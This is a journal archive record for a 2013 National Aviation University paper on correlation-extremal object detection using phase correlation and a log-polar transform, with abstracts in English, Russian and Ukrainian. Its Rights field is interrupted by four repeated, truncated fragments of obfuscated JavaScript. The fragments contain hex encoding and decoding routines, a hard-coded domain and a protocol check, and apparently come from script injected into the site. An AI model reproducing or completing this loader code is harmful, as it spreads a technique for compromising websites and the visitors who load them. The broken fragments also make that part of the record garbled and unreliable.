Record Details

CORRELATION EXTREMAL PRINCIPLE OF OBJECT DETECTION ON GROUND SURFACE

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title CORRELATION EXTREMAL PRINCIPLE OF OBJECT DETECTION ON GROUND SURFACE
Корреляционно-экстремальный принцип обнаружения объектов на земной поверхности
Кореляційно-екстремальний принцип виявлення об’єктів на земній поверхні
 
Creator Mukhina, Maryna; Національний авіаційний університет, проспект Космонавта Комарова, 1, Київ, Україна, 03680
 
Subject
correlation extremal principle; phase correlation; logarithmic polar transform
528.715:004.932(045)

корреляционно-экстремальный принцип; логарифмически-полярное преобразование; фазовая корреляция
528.715:004.932(045)

кореляційно-екстремальний принцип; логарифмічно-полярне перетворення; фазова кореляція
528.715:004.932(045)
 
Description  Features of correlation extremal principle for detection of ground objects are considered for visual surveillance. The method of phase correlation is researched and variants of its optimization are proposed.
 Рассмотрены особенности выявления объектов путем обработки изображений земной поверхности. Показано, что представление изображений в матричной форме позволяет использовать методы спектрального анализа двухмерных сигналов, в частности использование быстрого Фурье преобразования. Проанализированы существующие методы корреляционно-экстремальной обработки изображений. Отмечено, что именно спектральный метод, в частности метод фазовой корреляции, удовлетворяет требованиям, которые предъявляются к навигационным задачам (работает в режиме реального времени, устойчив к шумам и т.д.). Предложено использование фазовой корреляции с дополнительным логарифмически-полярным преобразованием, которое устраняет чувствительность метода к сдвигам или искажениям изображения. Установлено, что точность метода сохраняется даже при значительных поворотах изображения.
 Розглянуто особливості виявлення об’єктів шляхом обробки зображень земної поверхні. Показано, що подання в матричній формі дозволяє використати методи спектрального аналізу двовимірних сигналів, зокрема використання швидкого Фур’є перетворення. Проаналізовано наявні методи кореляційно-екстремальної обробки зображень. Зазначено, що саме спектральний метод, зокрема метод фазової кореляції, задовольняє вимоги, що пред’являються до навігаційних задач (працює в режимі реального часу, стійких до шумів та ін.). Запропоновано використання фазової кореляції з додатковим логарифмічно-полярним перетворенням, що усуває чутливість методу до зсувів або спотворень зображення. Визначено, що точність методу виявлення об’єкта зберігається навіть при значних поворотах зображень.
 
Publisher National Aviation University
 
Contributor


 
Date 2013-04-04
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/3864
10.18372/2306-1472.54.3864
 
Source Proceedings of the National Aviation University; Том 54, № 1 (2013); 55-59
Вестник Национального авиационного университета; Том 54, № 1 (2013); 55-59
Вісник Національного Авіаційного Університету; Том 54, № 1 (2013); 55-59
 
Language ru
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
 

Технічна підтримка: НДІІТТ НАУ